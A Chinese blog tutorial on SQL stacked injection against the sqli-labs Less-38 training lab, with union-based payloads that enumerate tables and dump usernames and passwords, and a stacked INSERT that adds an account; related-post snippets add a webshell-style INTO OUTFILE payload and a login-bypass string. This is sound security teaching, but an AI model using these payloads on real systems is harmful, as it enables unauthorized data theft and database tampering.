【SQL注入07】堆叠注入基础及实操(基于sqli-labs-less38)

已于 2022-07-01 04:35:38 修改
阅读量3.7k 收藏 7
点赞数 4
分类专栏: # 筑基07:WEB漏洞原理 文章标签: sql web安全 数据库
于 2022-02-20 17:01:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fighting_hawk/article/details/123026781
版权
本文详细介绍了SQL堆叠注入的概念、与union查询注入的区别,并通过一个具体的实验展示了如何在堆叠注入中执行多条SQL语句,包括新增数据库账号。实验涉及了注入点判断、数据库信息获取及堆叠注入的操作步骤,最后成功实现了数据库的堆叠注入。
摘要由CSDN通过智能技术生成

目录

1 堆叠注入概述

1.1 定义

  1. 英文为 stacked injection。
  2. 在SQL数据库中,每条语句是以;分开的,堆叠注入就是一次性注入并执行多条语句(多语句之间以分号隔开)的注入方式。

1.2 与union联合查询注入的对比

  1. union联合查询注入执行的语句类型是有限的,可以用来执行查询语句。
  2. 堆叠注入可以执行的是任意的语句,如增删改等
  3. 另外的,如布尔盲注延时盲注等其他语句也可以并到多语句中执行,只是没什么必要。

1.3 局限性

  1. 多语句执行受数据库类型、API、数据引擎的限制,有的不能实现。
  2. 增删改也收到用户权限的限制。

2 堆叠注入实验简介

2.1 实验平台

  1. 靶机:CentOS7安装docker,利用docker部署sqli-labs来作为实验平台。具体部署过程可以参考文章《Docker上搭建sqli-labs漏洞环境》。
  2. 真实机:本实验利用火狐浏览器来实现,为方便注入过程的编码,建议安装一个扩展插件harkbar,安装过程参考《HackBar免费版安装方法》由于该教程中的2.1.3harkbar我安装后无法正常使用,就安装了HackBar Quantum来代替。
  3. 靶机与真实机桥接到同一局域网中。

2.2 实验目标

  1. 使用堆叠注入往第38关数据库注入新账号;
  2. 查询新账号是否注入成功。

3 堆叠注入实验步骤

3.1 前戏

  1. 真实机打开火狐浏览器,访问靶机IP地址,出现下图,可以不重置实验平台,直接点击Page3进入堆叠实验的关卡。
    在这里插入图片描述
  2. 找到第38关进入,初始界面如下:
    在这里插入图片描述

3.2 判断注入点及注入类型

  1. 输入参数为?id=1可以看到数据库成功返回第一个账户账号及密码。修改id=2则是返回第二个账号密码,说明id是一个访问者可以控制输入的参数且页面会根据参数进行响应,是一个注入点。
    在这里插入图片描述
  2. 修改参数为?id=1'可以看到数据库没有回显账号密码,同时提示错误信息如下,分析错误提示可知该注入参数为字符型,且为单引号闭合。
    在这里插入图片描述
  3. 修改参数为?id=1'and '1'='1,根据反证法可知,该参数确实为单引号闭合的字符型,后续构成注入语句需要格外注意闭合单引号。具体判断方法请查看文章《反证法:判断注入类型是数值型还是字符型
    在这里插入图片描述

3.3 尝试使用union查询

  1. 目的:判断能否使用union联合查询注入。
  2. 修改参数为?id=1' order by 3--+,页面正常显示,当修改参数为4时,页面显示错误,说明回显内容有3列。
    在这里插入图片描述
  3. 修改参数为?id=-1' union select 1,2,3--+,可以看到2和3列数据可以回显。说明可以尝试union联合查询注入。
    在这里插入图片描述

3.4 union注入获取库名表名字段名

  1. 目的:为了往数据库中注入新的账号密码,我们需要知道账号密码是在哪个表哪些字段中,因此需要先用union联合注入获取相关信息。
  2. 获取库名。修改参数为?id=-1' union select 1,2,database()--+,发现本站点数据库为security。
    在这里插入图片描述
  3. 获取表名。修改参数为?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()--+,发现该数据库下公有4个表,其中有个users的表,是我们注入的目标。
    在这里插入图片描述
  4. 获取字段名。修改参数为?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users'--+,发现该表格下公有3个字段。
    在这里插入图片描述
  5. 按管理我们也获取一下字符内容吧,虽然该步骤不是本实验所必须的。修改参数为?id=-1' union select 1,2,group_concat(id,':',username,':',password) from users--+,发现有一堆账号。
    在这里插入图片描述

3.5 堆叠注入

  1. 目的:往后台数据库增加一个账号。
  2. 修改参数为?id=1';insert into users(id,username,password) values ('38','less38','hello')--+,语句执行后页面如下。
    在这里插入图片描述

3.6 实验结果

修改命令为?id=38,查询结果如下,实验成功。
在这里插入图片描述

4 总结

  1. 了解堆叠注入与union联合查询注入的区别;
  2. 了解堆叠注入的限制性因素;
  3. 掌握手动堆叠注入的方法。
Fighting_hawk
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sql-labs 堆叠注入
Khazking的博客
11-29 3053
转载:堆叠注入详解 - 渗透测试中心 - 博客园 (cnblogs.com) 第三十八题 id=1' 说明为' '闭合 id=1'--+ id=1' or updatexml(1,concat(database()),1)--+ id=1' union select 1,database(),2--+ 报错注入无效 联合注入无效说明查询语句不行 这时就可以用堆叠注入,因为堆叠注入可以执行任意类型的语句,并且它显示了字段名username和password 例如id=1';..
【合天网安】SQLi-Labs系列之堆叠注入
hehigoxqc606的博客
09-02 345
概念: Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆SQL语句(多条)一起执行。而在真实的运用中也是这样的,在mysql中,主要是命令行中,每一条语句结尾加分号;来表示语句结束。 堆叠注入使用条件 堆叠注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysql_multi_query()函数,其只能执行一条语句,分号后面的内容将不会被执行。 任务一:基于GET型的堆叠注..
sqli-labs通关全解----堆叠注入---38~45---11
cyynid的博客
01-13 457
本文引入一个新的概念:堆叠注入Stackedinjections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加;表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在;结束一个sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入
Sqli-labs 堆叠注入篇 (Less38~53)
angry_program的博客
02-15 1359
前言 本blog作为练习笔记, 文笔不才, 仅供参考, 不正之处望大神指正。 堆叠注入篇对应labs的38~53关: Less-38 字符型堆叠注入 虽然用很常规的方法都可以注入成功,但是并不侧重于注入爆数据; 而是考察堆叠注入: http://localhost:2333/Less-38/index.php ?id=0' union select 1...
sqli-labs通关攻略教程——堆叠注入+排序注入(less38~less65)
m0_55854679的博客
08-15 796
文章目录less 38方法1——报错注入联合注入堆叠注入less 39less 40联合注入堆叠注入less 41less 42报错注入堆叠注入less 43less 44less 45less 46报错注入时间盲注less 47less 48less 49less 50堆叠注入报错注入less 51less 52less 53less 54less 55less 56less 57less 58less 59less 60less 61less 62less 63less 64less 65 less 3
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
sqli-labs靶场练习笔记
11-09
- **SQLi-Labs介绍**:SQLi-Labs是一款专为学习和实践SQL注入技术而设计的靶场环境。它包含了多个关卡,每个关卡都模拟了一个具有特定SQL注入漏洞的应用场景。 - **学习价值**:通过解决这些关卡中的问题,学习者...
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未...
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
SQL注入堆叠注入
热门推荐
qq_45691294的博客
07-16 1万+
堆叠注入原理 堆叠注入,顾名思义,就是将语句堆叠在一起进行查询 原理很简单,mysql_multi_query() 支持多条sql语句同时执行,就是个;分隔,成堆的执行sql语句,例如 select * from users;show databases; 就同时执行以上两条命令,所以我们可以增删改查,只要权限够 虽然这个注入姿势很牛逼,但实际遇到很少,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysqli_multi_query()函
sql_labsqli中的堆叠注入(less-38
最新发布
qq_59020256的博客
12-23 731
id=1' order by 3 -- s 有回显。id=1' order by 4 -- s 报错。id=1' and 1=2 -- s 没有回显。id=1' and 1=1 -- s 有回显。接下来的步骤可以用联合查询进行查询。(1)在users表中添加一个用户。堆叠注入(less-38
SQL注入-堆叠注入
m0_53820621的博客
08-15 1404
数据库支持堆叠查询,所谓堆叠查询就是执行多条语句,语句以;隔开。并且代码使用了支持堆叠查询的函数,列如PHP的。堆叠注入就是在第二条语句中构造payload,注:页面只返回第一条语句,不返回第二条语句。堆叠注入后果很严重,可以直接对数据库增删改。...
sql注入 - 堆叠注入
wcy19990628的博客
02-10 324
5、堆叠(多语句)注入 http://localhost/sqli-labs-master/Less-38/?id=-1'; select "<?php phpinfo();?>" into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\aaaaaaaaqq.php" ;-- 在php连接mysql注入中用到了musqli_multi_query...
sqli-labs(十五)(堆叠注入)
weixin_30407099的博客
09-04 268
第三十八关: 后面好几关都是堆叠注入。简单介绍下: Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。 在SQL中,分号(;)是用来表示一条s...
SQL注入-07堆叠注入案例—以sqli-labs-less38为例
m0_64378913的博客
05-05 956
目录1 堆叠注入概述1.1 定义1.2 与union联合查询注入的对比1.3 局限性2 堆叠注入案例—以sqli-labs-less38为例2.1 实验平台2.2 实验目标2.3 堆叠注入实验步骤2.3.1 注入前准备2.3.2 判断注入点及注入类型2.3.3 判断回显列数及回显位置2.3.4 union注入获取库名表名字段名2.3.5 堆叠注入3 总结参考文章 1 堆叠注入概述 1.1 定义 英文为 stacked injection。 在SQL数据库中,每条语句是以;分开的,堆叠注入就是一次性注入并执
堆叠注入
weixin_30752377的博客
08-28 228
什么是堆叠注入? 顾名思义,堆叠注入就是将一堆sql语句叠加在一起执行,使用分号结束上一个语句再叠加其他语句一起执行。 题目 首先尝试闭合引号,并注释后面的内容。 发现没有报错,那就判断一下有多少列。 由此可以判断出有两列,接着判断回显位。 发现回显了过滤规则,select是被过滤的,还有一些注入常用语句也被过滤了。 这时就可以尝试一下堆叠注入。 发现这里爆出了所有数据库,再...
堆叠注入详解
weixin_30271335的博客
09-29 181
0x00 堆叠注入定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。 0x01 堆叠注入原理 在...
sql注入堆叠注入
weixin_42566218的博客
02-19 8733
一、堆叠注入的原理 mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔 开,而堆叠注入其实就是通过结束符来执行多条sql语句 比如我们在mysql的命令行界面执行一条查询语句,这时语句的结尾必须加上分号结束 select * from student; 如果我们想要执行多条sql那就用结束符分号进行隔开,比如在查询的同时查看当前登录用户是谁 select * from student;select current_user();
sqli-labs Less-7
08-28
SQLi-Labs是一个用于学习和练习SQL注入的在线平台,其中包含了多个不同的注入场景。Less-7是其中的一个场景,它主要讲解的是SQL注入基础知识。 在Less-7中,我们需要通过注入来绕过登录认证,获取到管理员的权限。具体步骤如下: 1. 打开SQLi-Labs平台,并选择Less-7场景。 2. 在登录框中输入任意用户名和密码,然后点击登录按钮。 3. 拦截登录请求,使用Burp Suite等工具修改POST请求的参数。 4. 在密码字段中尝试注入Payload,例如:'or '1'='1。 5. 发送修改后的请求,查看服务器返回的响应。 6. 如果成功绕过认证,系统会显示管理员页面。 请注意,在实际应用中,SQL注入是一种严重的安全漏洞,攻击者可以利用它来执行恶意操作。因此,保护应用程序免受SQL注入攻击至关重要。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值